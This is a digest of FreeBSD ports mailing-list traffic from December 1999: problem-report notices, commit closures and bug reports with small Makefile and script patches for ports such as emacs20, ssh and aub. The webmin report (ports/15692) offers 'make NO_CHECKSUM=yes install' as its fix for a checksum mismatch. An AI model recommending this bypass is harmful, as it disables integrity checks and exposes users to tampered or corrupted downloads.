Synopsis: problems fetching fd port State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 10:55:46 PST 1999 State-Changed-Why: New MASTER_SITE added. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 10:57:41 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C2F4B14D12; Sat, 25 Dec 1999 10:57:40 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA23559; Sat, 25 Dec 1999 10:57:40 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 10:57:40 -0800 (PST) From: Message-Id: <199912251857.KAA23559@freefall.freebsd.org> To: scott@sabunix.rresearch.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15674: fix spoolfile locking method in mail/nmh-1.0.2 port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: fix spoolfile locking method in mail/nmh-1.0.2 port State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 10:56:31 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 10:59: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3AC8814A1D; Sat, 25 Dec 1999 10:59:04 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA23787; Sat, 25 Dec 1999 10:59:03 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 10:59:03 -0800 (PST) From: Message-Id: <199912251859.KAA23787@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15673: Update port: math/umfpack Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: math/umfpack State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 10:57:55 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 11: 0: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B7ED7151FA for ; Sat, 25 Dec 1999 11:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA23929; Sat, 25 Dec 1999 11:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mach.greycat.com (mach.greycat.com [207.173.133.5]) by hub.freebsd.org (Postfix) with ESMTP id B3A0915058 for ; Sat, 25 Dec 1999 10:51:15 -0800 (PST) (envelope-from root@mach.greycat.com) Received: (from root@localhost) by mach.greycat.com (8.9.3/8.9.3) id KAA80819; Sat, 25 Dec 1999 10:51:39 -0800 (PST) (envelope-from root) Message-Id: <199912251851.KAA80819@mach.greycat.com> Date: Sat, 25 Dec 1999 10:51:39 -0800 (PST) From: dann@greycat.com Reply-To: dann@greycat.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15688: typo in ports/audio/Makefile Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15688 >Category: ports >Synopsis: ports/audio/Makefile has misspelling of directory name >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 11:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Dann Lunsford >Release: FreeBSD 3.4-STABLE i386 >Organization: You're kidding, right? >Environment: FreeBSD mach.greycat.com 3.4-STABLE FreeBSD 3.4-STABLE #0: Sun Dec 19 12:19:55 PST 1999 root@mach.greycat.com:/usr/src/sys/compile/SATELLITE i386 >Description: ports/audio/Makefile has a SUBDIR line for cd-control; should be cd-console. causes things such as "make readmes" to glitch. >How-To-Repeat: make readmes in ports/audio >Fix: --- Makefile.orig Sat Dec 25 10:41:37 1999 +++ Makefile Sat Dec 25 10:42:09 1999 @@ -6,7 +6,7 @@ SUBDIR += aumix SUBDIR += bladeenc SUBDIR += cam - SUBDIR += cd-control + SUBDIR += cd-console SUBDIR += cdd SUBDIR += cdindex SUBDIR += cdplay >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 11: 1:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ADDB4151FA; Sat, 25 Dec 1999 11:01:23 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA24226; Sat, 25 Dec 1999 11:01:23 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 11:01:23 -0800 (PST) From: Message-Id: <199912251901.LAA24226@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15672: Update port: archivers/gshar+gunshar to 4.2.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: archivers/gshar+gunshar to 4.2.1 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 10:59:24 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 11: 7:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6F20514BD5; Sat, 25 Dec 1999 11:07:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA24874; Sat, 25 Dec 1999 11:07:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 11:07:50 -0800 (PST) From: Message-Id: <199912251907.LAA24874@freefall.freebsd.org> To: dann@greycat.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15688: ports/audio/Makefile has misspelling of directory name Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ports/audio/Makefile has misspelling of directory name State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 11:07:28 PST 1999 State-Changed-Why: Doh, sorry. Thanks for catching this. :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 11:11:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0BA7715238; Sat, 25 Dec 1999 11:11:28 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA25434; Sat, 25 Dec 1999 11:11:22 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 11:11:22 -0800 (PST) From: Message-Id: <199912251911.LAA25434@freefall.freebsd.org> To: hetzels@westbend.net, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/14618: New port: security/librc4 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: security/librc4 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 11:10:06 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 11:18:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3617A14D9F; Sat, 25 Dec 1999 11:18:28 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA26445; Sat, 25 Dec 1999 11:18:28 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 11:18:28 -0800 (PST) From: Message-Id: <199912251918.LAA26445@freefall.freebsd.org> To: dbader@cielo.eece.unm.edu, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15686: ports/mpich UPDATE to new version 1.2.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ports/mpich UPDATE to new version 1.2.0 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 11:13:48 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 11:26:54 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A7D8C1521C; Sat, 25 Dec 1999 11:26:53 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA27517; Sat, 25 Dec 1999 11:26:53 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 11:26:53 -0800 (PST) From: Message-Id: <199912251926.LAA27517@freefall.freebsd.org> To: th@cis.ibaraki.ac.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/14381: New port: games/x3eyes Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: games/x3eyes State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 11:26:31 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 13:16:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from probity.mcc.ac.uk (probity.mcc.ac.uk [130.88.200.94]) by hub.freebsd.org (Postfix) with ESMTP id D6C6D14FCC for ; Sat, 25 Dec 1999 13:16:18 -0800 (PST) (envelope-from jcm@dogma.freebsd-uk.eu.org) Received: from dogma.freebsd-uk.eu.org ([130.88.200.97]) by probity.mcc.ac.uk with esmtp (Exim 1.92 #3) for ports@freebsd.org id 121yXy-000Lnz-00; Sat, 25 Dec 1999 21:16:18 +0000 Received: from localhost (jcm@localhost) by dogma.freebsd-uk.eu.org (8.9.3/8.9.3) with ESMTP id VAA39982 for ; Sat, 25 Dec 1999 21:16:17 GMT (envelope-from jcm@dogma.freebsd-uk.eu.org) Date: Sat, 25 Dec 1999 21:16:17 +0000 (GMT) From: Jonathon McKitrick To: ports@freebsd.org Subject: netscape menu questions Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sometimes the bookmarks menu has automatic highlighting of choices, other times i have to click on my choice. Why the difference? -jm To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 13:50: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A8A0F14E24 for ; Sat, 25 Dec 1999 13:50:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA43389; Sat, 25 Dec 1999 13:50:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 497B414D6B; Sat, 25 Dec 1999 13:49:47 -0800 (PST) Message-Id: <19991225214947.497B414D6B@hub.freebsd.org> Date: Sat, 25 Dec 1999 13:49:47 -0800 (PST) From: marquis@roble.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15691: Ssh ports fail to check inetd.conf before creating ../rc.d/sshd.sh Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15691 >Category: ports >Synopsis: Ssh ports fail to check inetd.conf before creating ../rc.d/sshd.sh >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 13:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Roger Marquis >Release: any >Organization: Roble Systems >Environment: n/a >Description: All ssh ports to-date (/usr/ports/security/ssh*) assume that sshd will be running as a standalone daemon and fail to check whether sshd is started from inetd. Where there is both an inetd and a standalone daemon errors problems logging in from ssh clients can occur which can result in a denial of service or lock-out situation when "make install" is used to install the deamon on a system where it is already started from inetd. Yes, we've heard the recommendation not to run sshd from inetd.conf however where inetd is running it makes no sense not to use it. There's also a higher vulnerability to DOS attacks to a standalone sshd than to inetd. Finally, the time to generate a session key is effectively zero on systems faster than 250MHz. >How-To-Repeat: >Fix: fix the Makefile i.e., if [ "`grep ssh /etc/inetd.conf|grep -v ^#ssh`" = "" ]; then @if [ ! -f ${PREFIX}/etc/rc.d/sshd.sh ]; then \ ${ECHO} "Installing ${PREFIX}/etc/rc.d/sshd.sh startup file."; \ ${ECHO} "#!/bin/sh" > ${PREFIX}/etc/rc.d/sshd.sh; \ ${ECHO} "[ -x ${PREFIX}/sbin/sshd ] && ${PREFIX}/sbin/sshd && ${ECHO} -n ' sshd'" >> ${PREFIX}/etc/rc.d/sshd.sh; \ ${CHMOD} 751 ${PREFIX}/etc/rc.d/sshd.sh; \ fi fi >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 14:10: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8994714D2F for ; Sat, 25 Dec 1999 14:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA46238; Sat, 25 Dec 1999 14:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id 2484A14C9C for ; Sat, 25 Dec 1999 14:01:12 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: (from vince@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) id MAA98602; Sat, 25 Dec 1999 12:01:16 -1000 (HST) (envelope-from vince) Message-Id: <199912252201.MAA98602@pele.WURLDLINK.NET> Date: Sat, 25 Dec 1999 12:01:16 -1000 (HST) From: Vincent Poy Reply-To: vince@pele.WURLDLINK.NET To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15692: webmin port checksum mismatch Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15692 >Category: ports >Synopsis: webmin port checksum mismatch >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 14:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vincent Poy >Release: FreeBSD 4.0-CURRENT i386 >Organization: Wurldlink Corporation - San Francisco - Honolulu - Hong Kong >Environment: 3.3-RELEASE and 4.0-CURRENT >Description: After andreas updated the webmin port, it seems there is a checksum mismatch >How-To-Repeat: make clean ; make install >Fix: make clean ; make NO_CHECKSUM=yes install >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 15:50: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F20271517E for ; Sat, 25 Dec 1999 15:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA51314; Sat, 25 Dec 1999 15:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from kot.ne.mediaone.net (kot.ne.mediaone.net [24.218.15.190]) by hub.freebsd.org (Postfix) with ESMTP id 99EF814E4A for ; Sat, 25 Dec 1999 15:40:08 -0800 (PST) (envelope-from mi@kot.ne.mediaone.net) Received: from rtfm.newton (rtfm.newton [10.10.0.1]) by kot.ne.mediaone.net (8.9.3/8.9.1) with ESMTP id SAA46268 for ; Sat, 25 Dec 1999 18:40:06 -0500 (EST) Received: (from mi@localhost) by rtfm.newton (8.9.3/8.9.3) id SAA08096; Sat, 25 Dec 1999 18:40:06 -0500 (EST) (envelope-from mi@kot.ne.mediaone.net) Message-Id: <199912252340.SAA08096@rtfm.newton> Date: Sat, 25 Dec 1999 18:40:06 -0500 (EST) From: Mikhail Teterin Reply-To: mi@kot.ne.mediaone.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15693: aub may fail on certain (bad?) postings Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15693 >Category: ports >Synopsis: aub may fail on certain (bad?) postings >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 15:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Mikhail Teterin >Release: FreeBSD 3.4-STABLE i386 >Organization: Virtual Estates, Inc. >Environment: >Description: As installed by the news/aub port, it will only recognize EOL by the \n symbol. Too many postings use \r :( I don't know where they come from (MACs?), but the included patch seems to make aub work nicer. >How-To-Repeat: >Fix: Please, commit this thing into aub's patches/patch-eol or something... --- aub Sat Dec 25 18:34:35 1999 @@ -992 +992 @@ - while ($socket_stuff !~ m/\n/) { # No complete line in buffer + while ($socket_stuff !~ m/\r\n/) { # No complete line in buffer >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 17:30: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CCDC01519F for ; Sat, 25 Dec 1999 17:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA54752; Sat, 25 Dec 1999 17:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from hunahpu.sics.se (hunahpu.sics.se [193.10.66.220]) by hub.freebsd.org (Postfix) with ESMTP id CD26D14C94; Sat, 25 Dec 1999 17:26:28 -0800 (PST) (envelope-from root@hunahpu.sics.se) Received: (from root@localhost) by hunahpu.sics.se (8.9.3/8.9.3) id CAA52004; Sun, 26 Dec 1999 02:26:29 +0100 (CET) (envelope-from root) Message-Id: <199912260126.CAA52004@hunahpu.sics.se> Date: Sun, 26 Dec 1999 02:26:29 +0100 (CET) From: assar@sics.se To: FreeBSD-gnats-submit@freebsd.org Cc: assar@sics.se, jseger@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15694: emacs20 port updated to 20.5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15694 >Category: ports >Synopsis: emacs20 port updated to 20.5 >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 17:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Assar Westerlund >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: >Description: Update the emacs20 port to 20.5 >How-To-Repeat: >Fix: diff -ruw emacs20.old/Makefile emacs20/Makefile --- emacs20.old/Makefile Wed Aug 25 07:43:36 1999 +++ emacs20/Makefile Sun Dec 26 02:24:23 1999 @@ -1,15 +1,16 @@ # New ports collection makefile for: GNU emacs -# Version required: 20.4 +# Version required: 20.5 # Date created: 29 October 1994 # Whom: jkh # # $FreeBSD: ports/editors/emacs20/Makefile,v 1.43 1999/08/25 05:43:36 obrien Exp $ # -DISTNAME= emacs-20.4 +DISTNAME= emacs-20.5 CATEGORIES= editors MASTER_SITES= ${MASTER_SITE_GNU} MASTER_SITE_SUBDIR= emacs +DISTFILES= emacs-20.5a${EXTRACT_SUFX} MAINTAINER= jseger@FreeBSD.org @@ -27,7 +28,7 @@ MAKE_ENV= INSTALL_SCRIPT="${INSTALL_SCRIPT}" MAN1= emacs.1 etags.1 ctags.1 -PLIST_SUB= EMACS_VER=20.4 EMACS_ARCH=${CONFIGURE_TARGET} +PLIST_SUB= EMACS_VER=20.5 EMACS_ARCH=${CONFIGURE_TARGET} .if defined(USE_XPG4) .if (${USE_XPG4} == "YES" || ${USE_XPG4} == "yes") diff -ruw emacs20.old/files/md5 emacs20/files/md5 --- emacs20.old/files/md5 Sun Aug 8 19:58:46 1999 +++ emacs20/files/md5 Sun Dec 26 00:28:56 1999 @@ -1 +1 @@ -MD5 (emacs-20.4.tar.gz) = 695614f204d918db617ba3ae849b273d +MD5 (emacs-20.5a.tar.gz) = d3852880bcd144c79be1b9537d28490c >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 17:40: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9CBA11512F for ; Sat, 25 Dec 1999 17:40:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA55125; Sat, 25 Dec 1999 17:40:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id A54AD14C20 for ; Sat, 25 Dec 1999 17:33:21 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: (from vince@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) id PAA09340; Sat, 25 Dec 1999 15:33:27 -1000 (HST) (envelope-from vince) Message-Id: <199912260133.PAA09340@pele.WURLDLINK.NET> Date: Sat, 25 Dec 1999 15:33:27 -1000 (HST) From: Vincent Poy Reply-To: vince@pele.WURLDLINK.NET To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15695: centericq port build fails Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15695 >Category: ports >Synopsis: centericq port build fails >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 17:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vincent Poy >Release: FreeBSD 4.0-CURRENT i386 >Organization: Wurldlink Corporation - San Francisco - Honolulu - Hong Kong >Environment: 3.3-RELEASE and 4.0-CURRENT >Description: centericq port build fails >How-To-Repeat: make clean ; make install will yield the following: konst.interface.o(.text+0x7d1): undefined reference to `mvinchnstr' ../ktools/libkonst.a(konst.interface.o): In function `kwindow::restorewindow(void)': konst.interface.o(.text+0x829): undefined reference to `mvaddchnstr' ../ktools/libkonst.a(konst.interface.o): In function `kwindow::redraw(void)': konst.interface.o(.text+0x995): undefined reference to `mvhline' konst.interface.o(.text+0x9d5): undefined reference to `mvvline' konst.interface.o(.text+0xa0d): undefined reference to `mvvline' konst.interface.o(.text+0xa49): undefined reference to `mvhline' konst.interface.o(.text+0xa81): undefined reference to `mvhline' ../ktools/libkonst.a(konst.interface.o): In function `kwindow::separatey(int)': konst.interface.o(.text+0xb48): undefined reference to `mvhline' ../ktools/libkonst.a(konst.interface.o): In function `kwindow::separatex(int)': konst.interface.o(.text+0xc40): undefined reference to `mvvline' ../ktools/libkonst.a(konst.interface.o): In function `kmenu::showall(void)': konst.interface.o(.text+0x1217): undefined reference to `mvhline' ../ktools/libkonst.a(konst.interface.o): In function `ktext::redraw(void)': konst.interface.o(.text+0x17b6): undefined reference to `mvhline' ../ktools/libkonst.a(konst.interface.o): In function `ktext::open(void)': konst.interface.o(.text+0x1a74): undefined reference to `mvinchnstr' ../ktools/libkonst.a(konst.interface.o): In function `ktext::close(void)': konst.interface.o(.text+0x1b8c): undefined reference to `mvaddchnstr' gmake: *** [center] Error 1 *** Error code 2 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. >Fix: Unknown >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 18: 6:38 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A217614DC4; Sat, 25 Dec 1999 18:06:37 -0800 (PST) (envelope-from dan@FreeBSD.org) Received: (from dan@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA56225; Sat, 25 Dec 1999 18:06:37 -0800 (PST) (envelope-from dan@FreeBSD.org) Date: Sat, 25 Dec 1999 18:06:37 -0800 (PST) From: Message-Id: <199912260206.SAA56225@freefall.freebsd.org> To: dan@FreeBSD.org, freebsd-ports@FreeBSD.org, jseger@FreeBSD.org Subject: Re: ports/15694: emacs20 port updated to 20.5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: emacs20 port updated to 20.5 Responsible-Changed-From-To: freebsd-ports->jseger Responsible-Changed-By: dan Responsible-Changed-When: Sat Dec 25 18:06:03 PST 1999 Responsible-Changed-Why: Over to maintainer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 18: 7:17 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6119114EBF; Sat, 25 Dec 1999 18:07:15 -0800 (PST) (envelope-from dan@FreeBSD.org) Received: (from dan@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA56311; Sat, 25 Dec 1999 18:07:15 -0800 (PST) (envelope-from dan@FreeBSD.org) Date: Sat, 25 Dec 1999 18:07:15 -0800 (PST) From: Message-Id: <199912260207.SAA56311@freefall.freebsd.org> To: dan@FreeBSD.org, freebsd-ports@FreeBSD.org, andreas@FreeBSD.org Subject: Re: ports/15692: webmin port checksum mismatch Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: webmin port checksum mismatch Responsible-Changed-From-To: freebsd-ports->andreas Responsible-Changed-By: dan Responsible-Changed-When: Sat Dec 25 18:06:50 PST 1999 Responsible-Changed-Why: Over to maintainer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 23:45:30 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3CA1614CBA; Sat, 25 Dec 1999 23:45:21 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA74201; Sat, 25 Dec 1999 23:45:21 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 25 Dec 1999 23:45:21 -0800 (PST) From: Message-Id: <199912260745.XAA74201@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, cpiazza@FreeBSD.org Subject: Re: ports/15695: centericq port build fails Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: centericq port build fails Responsible-Changed-From-To: freebsd-ports->cpiazza Responsible-Changed-By: cpiazza Responsible-Changed-When: Sat Dec 25 23:45:08 PST 1999 Responsible-Changed-Why: 